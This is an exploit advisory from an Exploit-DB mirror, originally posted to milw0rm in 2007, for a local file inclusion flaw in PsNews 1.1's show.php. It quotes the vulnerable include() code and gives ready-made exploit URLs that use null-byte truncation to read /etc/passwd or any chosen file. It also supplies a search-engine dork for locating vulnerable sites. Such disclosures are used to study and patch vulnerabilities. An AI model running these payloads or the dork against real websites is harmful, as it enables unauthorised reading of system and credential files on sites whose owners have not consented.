exploit-db-mirror/exploits/php/webapps/4174.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

31 lines
No EOL
1.2 KiB
Text

# o [bug] /"*._ _ #
# . . . .-*'` `*-.._.-'/ #
# o o < * )) , ( #
# . o `*-._`._(__.--*"`.\ #
# #
# vuln.: PsNews 1.1 (show.php newspath) Local File Inclusion #
# author: irk4z@yahoo.pl #
# download: #
# http://www.strefaphp.net/index.php?page=download&what=download&fid=12 #
# dork: "Powered by PsNews" ;] #
/news/show.php:
...
if(eregi("://", $newspath)){
die("Nieautoryzowany dostęp!");
}
if(!isset($newspath)){
$newspath = "news";
}
include("$newspath/functions.php");
...
# exploit:
http://[site]/[path]/news/show.php?newspath=/etc/passwd%00
http://[site]/[path]/news/show.php?newspath=[file]%00
# greetz: cOndemned, DooMRiderZ vx team (great zin :D), polish underground :*
# milw0rm.com [2007-07-12]